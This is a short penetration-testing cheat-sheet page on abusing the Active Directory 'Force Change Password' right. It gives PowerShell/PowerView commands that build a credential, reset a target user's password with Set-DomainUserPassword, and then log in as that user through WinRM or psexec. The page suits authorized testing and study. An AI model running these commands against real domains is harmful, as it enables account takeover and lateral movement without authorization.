Force Change Password

If we have the Force Change password privilege over a user, we can do exactly that. We can change the password of the user and then later run commands as that user.

Provided my password first

$SecPassword = ConvertTo-SecureString '<our-users-password>' -AsPlainText -Force

Then Our creds

$Cred = New-Object System.Management.Automation.PSCredential('<domain.name>\<our current user>', $SecPassword)

Then we specify the password we want to force on our target user

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

Then finally

Set-DomainUserPassword -Identity <user-that-wecan-changepassword> -AccountPassword $UserPassword -Credential $Cred

We can log in via winRM, psexec, and see what privileges the user had.

PreviousAllowed to Delegate To:NextResources

Last updated 3 years ago

hashtagProvided my password first

hashtagThen Our creds

Provided my password first

Then Our creds